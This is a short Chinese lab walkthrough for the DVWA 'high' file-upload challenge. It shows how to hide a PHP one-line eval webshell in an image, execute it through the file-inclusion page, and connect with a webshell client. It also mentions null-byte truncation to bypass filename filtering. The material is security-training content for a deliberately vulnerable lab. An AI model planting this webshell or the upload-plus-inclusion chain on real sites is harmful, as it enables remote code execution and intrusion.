DVWA的文件上传漏洞(high)
1.使用文件包含漏洞和文件上传漏洞,来连接shell
文件包含漏洞详细的漏洞介绍:https://blog.csdn.net/Vansnc/article/details/82528395
文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码
以dvwa靶机为例
我们先在文件上传漏洞的地方上传一张夹着一句话木马的图片:
使用edjpg工具,在图片里写入木马(使用方法:把图片拖到exe文件)
插入如下木马:
<?php eval($_POST[pass]);?>'
或者cmd插木马:https://www.jianshu.com/p/02c281f2471a
注意这里图片文件太大可能无法上传,建议选择10kb左右的文件
<?php eval($_POST[pass]);?>(远程连接密码为pass的webshell)
上传之后在文件上传漏洞页面打开访问,只会返回静态内容,文件不会被执行
我们需要转到文件包含漏洞的页面,通过page来访问图片文件并执行,
执行之后网页上显示的会是乱码
执行过后就可以使用菜刀连接webshell了
2.此外文件上传漏洞也可以用文件名后缀%00截断绕过过滤
[Sign]做不出ctf题的时候很痛苦,你只能眼睁睁看着其他人领先你